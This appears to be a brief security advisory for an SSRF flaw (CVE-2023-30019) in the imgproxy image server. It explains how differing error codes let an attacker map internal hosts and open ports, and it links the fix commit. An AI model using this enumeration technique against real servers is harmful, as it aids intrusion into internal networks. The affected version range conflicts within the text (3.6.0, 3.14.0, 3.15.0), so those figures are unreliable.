Headline
CVE-2023-30019: CVE-2023-30019: SSRF in imgproxy<=3.14.0
imgproxy <= 3.6.0 is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of sanitization of the imageURL parameter.
GitHub - imgproxy/imgproxy: Fast and secure standalone server for resizing and converting remote images
Fast and secure standalone server for resizing and converting remote images - GitHub - imgproxy/imgproxy: Fast and secure standalone server for resizing and converting remote images
GitHubimgproxy
This means that an attacker can still pass loopback addresses as part of the imageURL parameter, which could allow them to exploit the vulnerability.
This vulnerability may lead to internal enumeration of internal hosts or ports, It’s error based because the application returns two error messages:
- 500 Internal Server Error (Source image is unreachable): if the URL is unreachable, which means that the host or the port is unreachable or not open.
- 422 Unprocessable Entity (Invalid source image): if the URL is reachable and the port is open.
Mitigation: https://github.com/imgproxy/imgproxy/commit/1a9768a2c682e88820064aa3d9a05ea234ff3cc4
Related news
imgproxy prior to version 3.15.0 is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of sanitization of the imageURL parameter.